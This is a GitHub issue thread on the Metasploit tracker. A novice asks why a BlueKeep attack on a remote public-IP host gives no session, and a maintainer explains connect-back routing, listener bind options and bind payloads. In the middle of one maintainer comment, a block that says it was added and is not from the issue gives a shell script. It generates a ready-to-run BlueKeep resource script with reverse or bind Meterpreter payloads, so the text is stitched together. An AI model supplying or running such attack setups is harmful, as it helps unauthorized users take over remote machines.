rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

bluekeep no session #15938

Closed PratikDahal7 closed 2 years ago

PratikDahal7 commented 2 years ago

I'm trying to exploit BlueKeep on a remote computer (not a VM), and the target is also vulnerable. But every time no session is created. Why? I'm a noob with 0 knowledge in this field... help!! Commands I ran (I have Metasploit installed on Windows):

set rhost: 40.122.. set rport: 3389 (default) then run... but it ended up with no session. lhost and lport were set by Metasploit itself, which is the same as shown in ipconfig on the listener, and the payload is reverse_tcp.

I searched this issue and found: 1) it is due to GROOMBASE and GROOMSIZE 2) network issue

and tried changing groomsize from 250 to 100 but no luck, and groombase to "set target 1 to 8". And what does "network issue" mean? Should the payload be different to exploit a remote PC, or should lhost and lport be different, or must rdp_client_ip be different? It is set to the default, with address 192.168.0.100. No session.

And after a while, exploit successful but no session? And also, do we need to adjust NPP? And what is the command to find NPP on Windows?? https://pentest-tools.com/blog/bluekeep-exploit-metasploit/

HELP Me!!

bcoles commented 2 years ago

> set rhost: 40.122..

A remote host cannot establish a reverse connection to your lhost of 192.168.113.254 on your LAN.

Try a bind payload or configure IP forwarding and set ReverseListenerBindAddress and ReverseListenerBindPort.

PratikDahal7 commented 2 years ago

> set rhost: 40.122..
>
> A remote host cannot establish a reverse connection to your lhost of 192.168.113.254 on your LAN.
>
> Try a bind payload or configure IP forwarding and set ReverseListenerBindAddress and ReverseListenerBindPort.

Can you explain in detail? Which address and port should be used in ReverseListenerBindAddress and ReverseListenerBindPort? My external IP? And which port? Sorry for asking like a noob (:

bcoles commented 2 years ago

It is a network routing issue. See:

Set LHOST and LPORT to your public IP and public port. These will be used by the payload for the connect back.

Set ReverseListenerBindAddress and ReverseListenerBindPort to your local IP and local port on the host running Metasploit.

set LHOST                        <your public IP address which your target will connect to>
set LPORT                        <your public port which your target will connect to>
set ReverseListenerBindAddress   <your local IP address for a network interface>
set ReverseListenerBindPort      <a port on the local network interface>

Ensure port LPORT is forwarded from your border gateway to ReverseListenerBindAddress:ReverseListenerBindPort.
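The option split above (LHOST/LPORT are what the payload connects back to, ReverseListenerBindAddress/Port are where the handler actually listens) is easy to get wrong from a NAT'd LAN, so here is a small shell helper, added here as an example and not code from the issue or from Metasploit, that writes an msfconsole resource script with those options and first refuses an LHOST that is RFC 1918, loopback or link-local, since no Internet host can connect back to such an address. It also emits the bind-payload variant suggested earlier in the thread. The module path is Metasploit's BlueKeep module; all addresses and ports are placeholders, not the reporter's values.

```shell
#!/bin/sh
# Added example, not code from the issue or from Metasploit itself.
# Emits an msfconsole resource script for the BlueKeep module with the
# handler options discussed above, after refusing an LHOST that a remote
# target could never reach. Addresses and ports are placeholders (assumed).

# Return 0 when ADDR is RFC 1918, loopback or link-local. Such an address
# only routes on the LAN, so it cannot be a connect-back target for a host
# on the Internet (the 192.168.113.254 case in this issue).
is_private_ipv4() {
  case "$1" in
    10.*|127.*|169.254.*|192.168.*) return 0 ;;
    172.1[6-9].*|172.2[0-9].*|172.3[01].*) return 0 ;;
    *) return 1 ;;
  esac
}

# gen_reverse_rc PUBLIC_IP PUBLIC_PORT LOCAL_IP LOCAL_PORT
# LHOST/LPORT are embedded in the payload (what the target connects to).
# ReverseListenerBindAddress/Port is where the handler listens locally, so
# the border gateway must forward PUBLIC_PORT to LOCAL_IP:LOCAL_PORT.
gen_reverse_rc() {
  if is_private_ipv4 "$1"; then
    echo "refusing LHOST $1: private address, target cannot connect back to it" >&2
    return 1
  fi
  cat <<EOF
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set payload windows/x64/meterpreter/reverse_tcp
set LHOST $1
set LPORT $2
set ReverseListenerBindAddress $3
set ReverseListenerBindPort $4
EOF
}

# gen_bind_rc TARGET_PORT
# Bind alternative: the payload listens on the target, so nothing needs to
# be forwarded on the attacker side, but TARGET_PORT must be unused on the
# target and allowed inbound by its firewall.
gen_bind_rc() {
  cat <<EOF
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set payload windows/x64/meterpreter/bind_tcp
set LPORT $1
EOF
}

# Usage with placeholder addresses (assumed, not the reporter's):
#   gen_reverse_rc 203.0.113.5 4444 192.168.0.100 4444 > bluekeep.rc
#   msfconsole -r bluekeep.rc      then: set RHOSTS <target>; run
```

Run the generated file with `msfconsole -r bluekeep.rc`, then set RHOSTS and the target before running. The private-address check is deliberately the first thing the reverse variant does: if it fires, no amount of GROOMBASE or GROOMSIZE tuning will produce a session, because the exploit can succeed and the payload still has nowhere to connect.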

PratikDahal7 commented 2 years ago

> It is a network routing issue. See:
>
> Set LHOST and LPORT to your public IP and public port. These will be used by the payload for the connect back.
>
> Set ReverseListenerBindAddress and ReverseListenerBindPort to your local IP and local port on the host running Metasploit.
>
> set LHOST                        <your public IP address which your target will connect to>
> set LPORT                        <your public port which your target will connect to>
> set ReverseListenerBindAddress   <your local IP address for a network interface>
> set ReverseListenerBindPort      <a port on the local network interface>
>
> Ensure port LPORT is forwarded from your border gateway to ReverseListenerBindAddress:ReverseListenerBindPort.

Bro, I am behind NAT, so I tried using ngrok to port forward but with no success. You'd mentioned earlier that we can use either port forwarding or a bind payload. How do I use a bind payload?

bcoles commented 2 years ago

> how to use bind payload

The same way you would set any other payload. The easiest approach is to use tab auto completion with set payload <tab><tab> and select a suitable payload, such as windows/meterpreter/bind_tcp.

In order for a bind payload to work, the lport on the target host must be unused. In order to connect to the bind shell, the firewall must permit remote connections to the bound port.

The Metasploit issue tracker is for tracking issues with Metasploit. Perhaps someone on Slack can help you out with your questions:

github-actions[bot] commented 2 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 2 years ago

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.